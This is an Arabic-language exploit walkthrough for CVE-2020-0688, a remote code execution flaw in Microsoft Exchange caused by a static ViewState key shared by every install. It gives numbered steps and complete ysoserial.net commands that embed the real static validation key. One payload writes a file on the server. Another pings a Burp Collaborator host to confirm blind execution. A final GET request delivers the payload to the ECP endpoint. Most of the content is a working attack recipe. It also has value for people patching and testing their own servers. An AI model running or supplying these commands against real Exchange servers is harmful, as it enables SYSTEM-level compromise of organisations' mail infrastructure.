
[CVE-2020-0688] Microsoft Exchange Server ثغرة مفتاح تشفيري ثابت لتنفيذ التعليمات عن بُعد (RCE)
[CVE-2020-0688] تنفيذ التعليمات البرمجية عن بعد (RCE) بواسطة مفتاح تشفير ثابت في Microsoft Exchange Server
بدلاً من وجود مفاتيح مولدة عشوائياً لكل تثبيت، تحتوي جميع تثبيتات Microsoft Exchange Server على نفس قيمتي validationKey و decryptionKey في ملف web.config. وبالتالي، يمكن للمهاجم المُصادق عليه خداع الخادم لإلغاء تسلسل (deserialize) بيانات ViewState ضارة مصممة خصيصاً. بمساعدة YSoSerial.net، يمكن للمهاجم تنفيذ كود .NET تعسفي على الخادم في سياق تطبيق الويب لوحة تحكم Exchange (ECP)، الذي يعمل بصلاحيات SYSTEM.
الخطوة 1: قم بزيارة إحدى النقاط التالية للوصول إلى صفحة المصادقة
الخطوة 2: سجل الدخول باستخدام بيانات الاعتماد (بغض النظر عن صلاحيات حساب المستخدم)، واحصل على قيم صالحة لكل من ASP_NET_SessionId و __VIEWSTATEGENERATOR من كuki استجابة HTTP ونص استجابة HTTP على التوالي. على سبيل المثال
الخطوة 3: من أجل توليد الحمولة (للتحقق من الثغرة)، استخدم YSoSerial.net
لاحظ أنه إذا كان لديك وصول إلى خادم Exchange الضحية، يمكنك استخدام الحمولة التالية التي تنشئ ملفاً نصياً في الدليل C:\ باسم PoC.txt
PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo OOOPS!!! > c:/PoC.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy
ومع ذلك، إذا لم تتمكن من الوصول إلى الخادم، فقد يكون ما يلي أفضل.
PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "ping xxxxxxxx..burpcollaborator.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy
الخطوة 4: بعد الخطوة 3، سيكون لدينا حمولة ViewState مشفرة بعنوان URL. قم بإجراء طلب GET على النقطة التالية بالتنسيق التالي
http(s)://exchangeserver/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState_Payload>
المقالة الأصلية متاحة هنا